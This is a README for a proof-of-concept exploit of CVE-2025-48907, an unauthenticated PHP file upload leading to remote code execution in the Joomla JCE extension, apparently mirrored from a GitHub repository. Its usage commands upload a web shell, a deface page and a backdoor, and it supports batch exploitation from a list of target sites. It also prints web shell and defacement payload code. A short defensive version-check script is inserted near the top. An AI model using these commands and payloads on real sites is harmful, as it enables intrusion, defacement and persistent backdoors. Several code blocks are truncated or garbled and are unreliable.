## https://sploitus.com/exploit?id=0D7DE32F-DF63-51D0-A699-AAD3D055B58E
CVE-2025-48907 - Joomla! JCE Unauthenticated RCE
Joomla! JCE extension
License: [MIT](https://opensource.org/licenses/MIT) | Language: [Python](https://www.python.org/downloads/) | Repository: [github.com/0xgh057r3c0n/CVE-2025-48907](https://github.com/0xgh057r3c0n/CVE-2025-48907)
---
## Overview
This repository contains a **proof-of-concept (PoC) exploit** for **CVE-2025-48907**, a critical vulnerability in the Joomla! JCE (Joomla Content Editor) extension versions prior to **2.9.99.5**. The vulnerability allows **unauthenticated attackers** to upload arbitrary **PHP files** via the JCE profile import functionality, leading to **Remote Code Execution (RCE)**.
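A defender-side check, added here and not part of the PoC or of the JCE project: it reads the release from a Joomla extension manifest and decides whether it falls below the fixed version 2.9.99.5 named above. The manifest element name `<version>` and the constructed sample manifest are assumptions for illustration, not copied from JCE.

```python
"""Added example: flag JCE installs older than the fixed release 2.9.99.5."""
import re
import xml.etree.ElementTree as ET

FIXED_VERSION = "2.9.99.5"  # first non-vulnerable release per this advisory


def parse_version(version):
    """Turn a dotted version into an int tuple: "2.9.99.5" -> (2, 9, 99, 5).

    Plain string comparison is wrong for four-part versions
    ("2.9.99.10" < "2.9.99.5" as strings), so compare numerically.
    """
    parts = re.findall(r"\d+", version)
    if not parts:
        raise ValueError(f"unparseable version string: {version!r}")
    return tuple(int(p) for p in parts)


def is_vulnerable(installed, fixed=FIXED_VERSION):
    """True when installed < fixed, padding missing trailing parts with 0."""
    a, b = parse_version(installed), parse_version(fixed)
    width = max(len(a), len(b))
    return a + (0,) * (width - len(a)) < b + (0,) * (width - len(b))


def version_from_manifest(xml_text):
    """Extract the <version> element of an extension manifest (assumed layout)."""
    root = ET.fromstring(xml_text)
    el = root.find("version")
    if el is None or not el.text or not el.text.strip():
        raise ValueError("manifest carries no <version> element")
    return el.text.strip()


def check_manifest(xml_text):
    """Return True if the manifest describes a version still affected."""
    return is_vulnerable(version_from_manifest(xml_text))


# Constructed sample manifest for a stand-alone run (not a real JCE file).
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<extension type="component" method="upgrade">
  <name>JCE</name>
  <version>2.9.98</version>
</extension>"""

if __name__ == "__main__":
    state = "VULNERABLE" if check_manifest(SAMPLE_MANIFEST) else "patched"
    print(f"JCE {version_from_manifest(SAMPLE_MANIFEST)}: {state}")
```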
### ⚠️ Disclaimer
> **This tool is for educational and authorized testing purposes only.**
> - Use only on systems you own or have explicit permission to test
> - The author is not responsible for any misuse or illegal activities
> - Always obtain proper authorization before testing
---
## Vulnerability Details
| Property | Value |
|----------|-------|
| **CVE ID** | CVE-2025-48907 |
| **Product** | Joomla! JCE Extension |
| **Affected Versions** | prior to 2.9.99.5 |
### Examples
#### Upload a PHP Web Shell
```bash
python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php
```
#### Upload a PHP Deface Page
```bash
python3 CVE-2025-48907.py -u http://target-joomla.com -F deface.php
```
#### Upload a PHP Backdoor
```bash
python3 CVE-2025-48907.py -u http://target-joomla.com -F backdoor.php
```
#### Batch Exploitation with Targets File
```bash
python3 CVE-2025-48907.py -f targets.txt -F payload.php
```
#### With Verbose Output & Results Saving
```bash
python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php -v -o results.txt
```
### Command Line Arguments
| Argument | Required | Description |
|----------|----------|-------------|
| `-u, --url` | Yes* | Single target URL (e.g., http://target.com) |
| `-f, --file` | Yes* | File containing list of target URLs (one per line) |
| `-F, --upload-file` | Yes | PHP file to upload (shell, backdoor, deface page) |
| `-v, --verbose` | No | Enable verbose output for debugging |
| `-o, --output` | No | Save successful upload URLs to file |
\* Either `-u` or `-f` must be provided
### Targets File Format
Create a `targets.txt` file with one URL per line:
```text
http://joomla-site1.com
https://joomla-site2.com
http://192.168.1.100/joomla
# Comments are ignored
https://example-joomla.com
```
---
## Creating PHP Payloads
All payloads must be **PHP files** since the exploit uploads PHP code that will be executed on the server.
### PHP Web Shell
Create `shell.php`:
```php
";
system($_GET['cmd']);
echo "";
} else {
echo "Usage: ?cmd=command";
}
?>
```
### PHP Deface Page
Create `deface.php`:
```php
Hacked by 0xgh057r3c0n
body {
background: #000;
color: #0f0;
font-family: "Courier New", monospace;
text-align: center;
padding: 50px;
}
h1 { font-size: 4em; text-shadow: 0 0 20px #0f0; }
.ascii-art { white-space: pre; font-size: 12px; }
HACKED BY 0xgh057r3c0n
[ASCII-art banner: box-drawing characters garbled in extraction]
Security is not a product, it\'s a process.
Server:
Time:
';
?>
```
### PHP Backdoor (Minimal)
Create `backdoor.php`:
```php
```
---
## Output Example
```
[ASCII-art tool banner; remainder of the output example truncated in extraction]
```
Built with ❤️ by 0xgh057r3c0n